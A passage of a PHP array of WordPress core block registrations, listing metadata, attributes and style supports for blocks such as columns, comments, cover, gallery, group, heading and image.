true, 'link' => true, 'heading' => true, 'button' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'blockGap' => array( '__experimentalDefault' => '2em', 'sides' => array( 'horizontal', 'vertical' ) ), 'margin' => array( 'top', 'bottom' ), 'padding' => true, '__experimentalDefaultControls' => array( 'padding' => true, 'blockGap' => true ) ), 'layout' => array( 'allowSwitching' => false, 'allowInheriting' => false, 'allowEditing' => false, 'default' => array( 'type' => 'flex', 'flexWrap' => 'nowrap' ) ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true, '__experimentalDefaultControls' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-columns-editor', 'style' => 'wp-block-columns' ), 'comment-author-name' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comment-author-name', 'title' => 'Comment Author Name', 'category' => 'theme', 'ancestor' => array( 'core/comment-template' ), 'description' => 'Displays the name of the author of the comment.', 'textdomain' => 'default', 'attributes' => array( 'isLink' => array( 'type' => 'boolean', 'default' => true ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ), 'textAlign' => array( 'type' => 'string' ) ), 'usesContext' => array( 'commentId' ), 'supports' => array( 'html' => false, 'spacing' => array( 'margin' => true, 'padding' => true ), 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'comment-content' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comment-content', 'title' => 'Comment Content', 'category' => 'theme', 'ancestor' => array( 'core/comment-template' ), 'description' => 'Displays the contents of a comment.', 'textdomain' => 'default', 'usesContext' => array( 'commentId' ), 'attributes' => array( 'textAlign' => array( 'type' => 'string' ) ), 'supports' => array( 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'spacing' => array( 'padding' => array( 'horizontal', 'vertical' ), '__experimentalDefaultControls' => array( 'padding' => true ) ), 'html' => false ) ), 'comment-date' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comment-date', 'title' => 'Comment Date', 'category' => 'theme', 'ancestor' => array( 'core/comment-template' ), 'description' => 'Displays the date on which the comment was posted.', 'textdomain' => 'default', 'attributes' => array( 'format' => array( 'type' => 'string' ), 'isLink' => array( 'type' => 'boolean', 'default' => true ) ), 'usesContext' => array( 'commentId' ), 'supports' => array( 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'comment-edit-link' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comment-edit-link', 'title' => 'Comment Edit Link', 'category' => 'theme', 'ancestor' => array( 'core/comment-template' ), 'description' => 'Displays a link to edit the comment in the WordPress Dashboard. This link is only visible to users with the edit comment capability.', 'textdomain' => 'default', 'usesContext' => array( 'commentId' ), 'attributes' => array( 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ), 'textAlign' => array( 'type' => 'string' ) ), 'supports' => array( 'html' => false, 'color' => array( 'link' => true, 'gradients' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'comment-reply-link' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comment-reply-link', 'title' => 'Comment Reply Link', 'category' => 'theme', 'ancestor' => array( 'core/comment-template' ), 'description' => 'Displays a link to reply to a comment.', 'textdomain' => 'default', 'usesContext' => array( 'commentId' ), 'attributes' => array( 'textAlign' => array( 'type' => 'string' ) ), 'supports' => array( 'color' => array( 'gradients' => true, 'link' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'html' => false ) ), 'comment-template' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comment-template', 'title' => 'Comment Template', 'category' => 'design', 'parent' => array( 'core/comments' ), 'description' => 'Contains the block elements used to display a comment, like the title, date, author, avatar and more.', 'textdomain' => 'default', 'usesContext' => array( 'postId' ), 'supports' => array( 'align' => true, 'html' => false, 'reusable' => false, 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'style' => 'wp-block-comment-template' ), 'comments' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comments', 'title' => 'Comments', 'category' => 'theme', 'description' => 'An advanced block that allows displaying post comments using different visual configurations.', 'textdomain' => 'default', 'attributes' => array( 'tagName' => array( 'type' => 'string', 'default' => 'div' ), 'legacy' => array( 'type' => 'boolean', 'default' => false ) ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'html' => false, 'color' => array( 'gradients' => true, 'heading' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-comments-editor', 'usesContext' => array( 'postId', 'postType' ) ), 'comments-pagination' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comments-pagination', 'title' => 'Comments Pagination', 'category' => 'theme', 'parent' => array( 'core/comments' ), 'description' => 'Displays a paginated navigation to next/previous set of comments, when applicable.', 'textdomain' => 'default', 'attributes' => array( 'paginationArrow' => array( 'type' => 'string', 'default' => 'none' ) ), 'providesContext' => array( 'comments/paginationArrow' => 'paginationArrow' ), 'supports' => array( 'align' => true, 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'layout' => array( 'allowSwitching' => false, 'allowInheriting' => false, 'default' => array( 'type' => 'flex' ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-comments-pagination-editor', 'style' => 'wp-block-comments-pagination' ), 'comments-pagination-next' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comments-pagination-next', 'title' => 'Comments Next Page', 'category' => 'theme', 'parent' => array( 'core/comments-pagination' ), 'description' => 'Displays the next comment\'s page link.', 'textdomain' => 'default', 'attributes' => array( 'label' => array( 'type' => 'string' ) ), 'usesContext' => array( 'postId', 'comments/paginationArrow' ), 'supports' => array( 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'comments-pagination-numbers' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comments-pagination-numbers', 'title' => 'Comments Page Numbers', 'category' => 'theme', 'parent' => array( 'core/comments-pagination' ), 'description' => 'Displays a list of page numbers for comments pagination.', 'textdomain' => 'default', 'usesContext' => array( 'postId' ), 'supports' => array( 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'comments-pagination-previous' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comments-pagination-previous', 'title' => 'Comments Previous Page', 'category' => 'theme', 'parent' => array( 'core/comments-pagination' ), 'description' => 'Displays the previous comment\'s page link.', 'textdomain' => 'default', 'attributes' => array( 'label' => array( 'type' => 'string' ) ), 'usesContext' => array( 'postId', 'comments/paginationArrow' ), 'supports' => array( 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'comments-title' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/comments-title', 'title' => 'Comments Title', 'category' => 'theme', 'ancestor' => array( 'core/comments' ), 'description' => 'Displays a title with the number of comments', 'textdomain' => 'default', 'usesContext' => array( 'postId', 'postType' ), 'attributes' => array( 'textAlign' => array( 'type' => 'string' ), 'showPostTitle' => array( 'type' => 'boolean', 'default' => true ), 'showCommentsCount' => array( 'type' => 'boolean', 'default' => true ), 'level' => array( 'type' => 'number', 'default' => 2 ) ), 'supports' => array( 'anchor' => false, 'align' => true, 'html' => false, '__experimentalBorder' => array( 'radius' => true, 'color' => true, 'width' => true, 'style' => true ), 'color' => array( 'gradients' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, '__experimentalFontFamily' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true ) ) ) ), 'cover' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/cover', 'title' => 'Cover', 'category' => 'media', 'description' => 'Add an image or video with a text overlay.', 'textdomain' => 'default', 'attributes' => array( 'url' => array( 'type' => 'string' ), 'useFeaturedImage' => array( 'type' => 'boolean', 'default' => false ), 'id' => array( 'type' => 'number' ), 'alt' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'alt', 'default' => '' ), 'hasParallax' => array( 'type' => 'boolean', 'default' => false ), 'isRepeated' => array( 'type' => 'boolean', 'default' => false ), 'dimRatio' => array( 'type' => 'number', 'default' => 100 ), 'overlayColor' => array( 'type' => 'string' ), 'customOverlayColor' => array( 'type' => 'string' ), 'backgroundType' => array( 'type' => 'string', 'default' => 'image' ), 'focalPoint' => array( 'type' => 'object' ), 'minHeight' => array( 'type' => 'number' ), 'minHeightUnit' => array( 'type' => 'string' ), 'gradient' => array( 'type' => 'string' ), 'customGradient' => array( 'type' => 'string' ), 'contentPosition' => array( 'type' => 'string' ), 'isDark' => array( 'type' => 'boolean', 'default' => true ), 'allowedBlocks' => array( 'type' => 'array' ), 'templateLock' => array( 'type' => array( 'string', 'boolean' ), 'enum' => array( 'all', 'insert', 'contentOnly', false ) ), 'tagName' => array( 'type' => 'string', 'default' => 'div' ) ), 'usesContext' => array( 'postId', 'postType' ), 'supports' => array( 'anchor' => true, 'align' => true, 'html' => false, 'spacing' => array( 'padding' => true, 'margin' => array( 'top', 'bottom' ), 'blockGap' => true, '__experimentalDefaultControls' => array( 'padding' => true, 'blockGap' => true ) ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true, '__experimentalDefaultControls' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true ) ), 'color' => array( '__experimentalDuotone' => '> .wp-block-cover__image-background, > .wp-block-cover__video-background', 'heading' => true, 'text' => true, 'background' => false, '__experimentalSkipSerialization' => array( 'gradients' ), 'enableContrastChecker' => false ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'layout' => array( 'allowJustification' => false ) ), 'editorStyle' => 'wp-block-cover-editor', 'style' => 'wp-block-cover' ), 'details' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/details', 'title' => 'Details', 'category' => 'text', 'description' => 'Hide and show additional content.', 'keywords' => array( 'accordion', 'summary', 'toggle', 'disclosure' ), 'textdomain' => 'default', 'attributes' => array( 'showContent' => array( 'type' => 'boolean', 'default' => false ), 'summary' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'summary' ) ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), '__experimentalBorder' => array( 'color' => true, 'width' => true, 'style' => true ), 'html' => false, 'spacing' => array( 'margin' => true, 'padding' => true, 'blockGap' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'layout' => array( 'allowEditing' => false ) ), 'editorStyle' => 'wp-block-details-editor', 'style' => 'wp-block-details' ), 'embed' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/embed', 'title' => 'Embed', 'category' => 'embed', 'description' => 'Add a block that displays content pulled from other sites, like Twitter or YouTube.', 'textdomain' => 'default', 'attributes' => array( 'url' => array( 'type' => 'string', '__experimentalRole' => 'content' ), 'caption' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'figcaption', '__experimentalRole' => 'content' ), 'type' => array( 'type' => 'string', '__experimentalRole' => 'content' ), 'providerNameSlug' => array( 'type' => 'string', '__experimentalRole' => 'content' ), 'allowResponsive' => array( 'type' => 'boolean', 'default' => true ), 'responsive' => array( 'type' => 'boolean', 'default' => false, '__experimentalRole' => 'content' ), 'previewable' => array( 'type' => 'boolean', 'default' => true, '__experimentalRole' => 'content' ) ), 'supports' => array( 'align' => true, 'spacing' => array( 'margin' => true ) ), 'editorStyle' => 'wp-block-embed-editor', 'style' => 'wp-block-embed' ), 'file' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/file', 'title' => 'File', 'category' => 'media', 'description' => 'Add a link to a downloadable file.', 'keywords' => array( 'document', 'pdf', 'download' ), 'textdomain' => 'default', 'attributes' => array( 'id' => array( 'type' => 'number' ), 'href' => array( 'type' => 'string' ), 'fileId' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'a:not([download])', 'attribute' => 'id' ), 'fileName' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'a:not([download])' ), 'textLinkHref' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'a:not([download])', 'attribute' => 'href' ), 'textLinkTarget' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'a:not([download])', 'attribute' => 'target' ), 'showDownloadButton' => array( 'type' => 'boolean', 'default' => true ), 'downloadButtonText' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'a[download]' ), 'displayPreview' => array( 'type' => 'boolean' ), 'previewHeight' => array( 'type' => 'number', 'default' => 600 ) ), 'supports' => array( 'anchor' => true, 'align' => true, 'spacing' => array( 'margin' => true, 'padding' => true ), 'color' => array( 'gradients' => true, 'link' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true, 'link' => true ) ), 'interactivity' => true ), 'viewScript' => 'file:./view.min.js', 'editorStyle' => 'wp-block-file-editor', 'style' => 'wp-block-file' ), 'footnotes' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/footnotes', 'title' => 'Footnotes', 'category' => 'text', 'description' => '', 'keywords' => array( 'references' ), 'textdomain' => 'default', 'usesContext' => array( 'postId', 'postType' ), 'supports' => array( '__experimentalBorder' => array( 'radius' => true, 'color' => true, 'width' => true, 'style' => true, '__experimentalDefaultControls' => array( 'radius' => false, 'color' => false, 'width' => false, 'style' => false ) ), 'color' => array( 'background' => true, 'link' => true, 'text' => true, '__experimentalDefaultControls' => array( 'link' => true, 'text' => true ) ), 'html' => false, 'multiple' => false, 'reusable' => false, 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalTextDecoration' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalTextTransform' => true, '__experimentalWritingMode' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'style' => 'wp-block-footnotes' ), 'freeform' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/freeform', 'title' => 'Classic', 'category' => 'text', 'description' => 'Use the classic WordPress editor.', 'textdomain' => 'default', 'attributes' => array( 'content' => array( 'type' => 'string', 'source' => 'raw' ) ), 'supports' => array( 'className' => false, 'customClassName' => false, 'reusable' => false ), 'editorStyle' => 'wp-block-freeform-editor' ), 'gallery' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/gallery', 'title' => 'Gallery', 'category' => 'media', 'description' => 'Display multiple images in a rich gallery.', 'keywords' => array( 'images', 'photos' ), 'textdomain' => 'default', 'attributes' => array( 'images' => array( 'type' => 'array', 'default' => array( ), 'source' => 'query', 'selector' => '.blocks-gallery-item', 'query' => array( 'url' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'src' ), 'fullUrl' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'data-full-url' ), 'link' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'data-link' ), 'alt' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'alt', 'default' => '' ), 'id' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'data-id' ), 'caption' => array( 'type' => 'string', 'source' => 'html', 'selector' => '.blocks-gallery-item__caption' ) ) ), 'ids' => array( 'type' => 'array', 'items' => array( 'type' => 'number' ), 'default' => array( ) ), 'shortCodeTransforms' => array( 'type' => 'array', 'items' => array( 'type' => 'object' ), 'default' => array( ) ), 'columns' => array( 'type' => 'number', 'minimum' => 1, 'maximum' => 8 ), 'caption' => array( 'type' => 'string', 'source' => 'html', 'selector' => '.blocks-gallery-caption' ), 'imageCrop' => array( 'type' => 'boolean', 'default' => true ), 'fixedHeight' => array( 'type' => 'boolean', 'default' => true ), 'linkTarget' => array( 'type' => 'string' ), 'linkTo' => array( 'type' => 'string' ), 'sizeSlug' => array( 'type' => 'string', 'default' => 'large' ), 'allowResize' => array( 'type' => 'boolean', 'default' => false ) ), 'providesContext' => array( 'allowResize' => 'allowResize', 'imageCrop' => 'imageCrop', 'fixedHeight' => 'fixedHeight' ), 'supports' => array( 'anchor' => true, 'align' => true, 'html' => false, 'units' => array( 'px', 'em', 'rem', 'vh', 'vw' ), 'spacing' => array( 'margin' => true, 'padding' => true, 'blockGap' => array( 'horizontal', 'vertical' ), '__experimentalSkipSerialization' => array( 'blockGap' ), '__experimentalDefaultControls' => array( 'blockGap' => true, 'margin' => false, 'padding' => false ) ), 'color' => array( 'text' => false, 'background' => true, 'gradients' => true ), 'layout' => array( 'allowSwitching' => false, 'allowInheriting' => false, 'allowEditing' => false, 'default' => array( 'type' => 'flex' ) ) ), 'editorStyle' => 'wp-block-gallery-editor', 'style' => 'wp-block-gallery' ), 'group' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/group', 'title' => 'Group', 'category' => 'design', 'description' => 'Gather blocks in a layout container.', 'keywords' => array( 'container', 'wrapper', 'row', 'section' ), 'textdomain' => 'default', 'attributes' => array( 'tagName' => array( 'type' => 'string', 'default' => 'div' ), 'templateLock' => array( 'type' => array( 'string', 'boolean' ), 'enum' => array( 'all', 'insert', 'contentOnly', false ) ), 'allowedBlocks' => array( 'type' => 'array' ) ), 'supports' => array( '__experimentalOnEnter' => true, '__experimentalOnMerge' => true, '__experimentalSettings' => true, '__experimentalMetadata' => true, 'align' => array( 'wide', 'full' ), 'anchor' => true, 'ariaLabel' => true, 'html' => false, 'background' => array( 'backgroundImage' => true ), 'color' => array( 'gradients' => true, 'heading' => true, 'button' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => array( 'top', 'bottom' ), 'padding' => true, 'blockGap' => true, '__experimentalDefaultControls' => array( 'padding' => true, 'blockGap' => true ) ), 'dimensions' => array( 'minHeight' => true ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true, '__experimentalDefaultControls' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true ) ), 'position' => array( 'sticky' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'layout' => array( 'allowSizingOnChildren' => true ) ), 'editorStyle' => 'wp-block-group-editor', 'style' => 'wp-block-group' ), 'heading' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/heading', 'title' => 'Heading', 'category' => 'text', 'description' => 'Introduce new sections and organize content to help visitors (and search engines) understand the structure of your content.', 'keywords' => array( 'title', 'subtitle' ), 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ), 'content' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'h1,h2,h3,h4,h5,h6', 'default' => '', '__experimentalRole' => 'content' ), 'level' => array( 'type' => 'number', 'default' => 2 ), 'placeholder' => array( 'type' => 'string' ) ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'anchor' => true, 'className' => true, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalWritingMode' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, 'fontAppearance' => true, 'textTransform' => true ) ), '__unstablePasteTextInline' => true, '__experimentalSlashInserter' => true ), 'editorStyle' => 'wp-block-heading-editor', 'style' => 'wp-block-heading' ), 'home-link' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/home-link', 'category' => 'design', 'parent' => array( 'core/navigation' ), 'title' => 'Home Link', 'description' => 'Create a link that always points to the homepage of the site. Usually not necessary if there is already a site title link present in the header.', 'textdomain' => 'default', 'attributes' => array( 'label' => array( 'type' => 'string' ) ), 'usesContext' => array( 'textColor', 'customTextColor', 'backgroundColor', 'customBackgroundColor', 'fontSize', 'customFontSize', 'style' ), 'supports' => array( 'reusable' => false, 'html' => false, 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-home-link-editor', 'style' => 'wp-block-home-link' ), 'html' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/html', 'title' => 'Custom HTML', 'category' => 'widgets', 'description' => 'Add custom HTML code and preview it as you edit.', 'keywords' => array( 'embed' ), 'textdomain' => 'default', 'attributes' => array( 'content' => array( 'type' => 'string', 'source' => 'raw' ) ), 'supports' => array( 'customClassName' => false, 'className' => false, 'html' => false ), 'editorStyle' => 'wp-block-html-editor' ), 'image' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/image', 'title' => 'Image', 'category' => 'media', 'usesContext' => array( 'allowResize', 'imageCrop', 'fixedHeight' ), 'description' => 'Insert an image to make a visual statement.', 'keywords' => array( 'img', 'photo', 'picture' ), 'textdomain' => 'default', 'attributes' => array( 'align' => array( 'type' => 'string' ), 'url' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'src', '__experimentalRole' => 'content' ), 'alt' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'alt', 'default' => '', '__experimentalRole' => 'content' ), 'caption' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'figcaption', '__experimentalRole' => 'content' ), 'lightbox' => array( 'type' => 'object', 'enabled' => array( 'type' => 'boolean' ) ), 'title' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'img', 'attribute' => 'title', '__experimentalRole' => 'content' ), 'href' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure > a', 'attribute' => 'href', '__experimentalRole' => 'content' ), 'rel' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure > a', 'attribute' => 'rel' ), 'linkClass' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure > a', 'attribute' => 'class' ), 'id' => array( 'type' => 'number', '__experimentalRole' => 'content' ), 'width' => array( 'type' => 'string' ), 'height' => array( 'type' => 'string' ), 'aspectRatio' => array( 'type' => 'string' ), 'scale' => array( 'type' => 'string' ), 'sizeSlug' => array( 'type' => 'string' ), 'linkDestination' => array( 'type' => 'string' ), 'linkTarget' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure > a', 'attribute' => 'target' ) ), 'supports' => array( 'anchor' => true, 'color' => array( 'text' => false, 'background' => false ), 'filter' => array( 'duotone' => true ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'width' => true, '__experimentalSkipSerialization' => true, '__experimentalDefaultControls' => array( 'color' => true, 'radius' => true, 'width' => true ) ) ), 'selectors' => array( 'border' => '.wp-block-image img, .wp-block-image .wp-block-image__crop-area, .wp-block-image .components-placeholder', 'filter' => array( 'duotone' => '.wp-block-image img, .wp-block-image .components-placeholder' ) ), 'styles' => array( array( 'name' => 'default', 'label' => 'Default', 'isDefault' => true ), array( 'name' => 'rounded', 'label' => 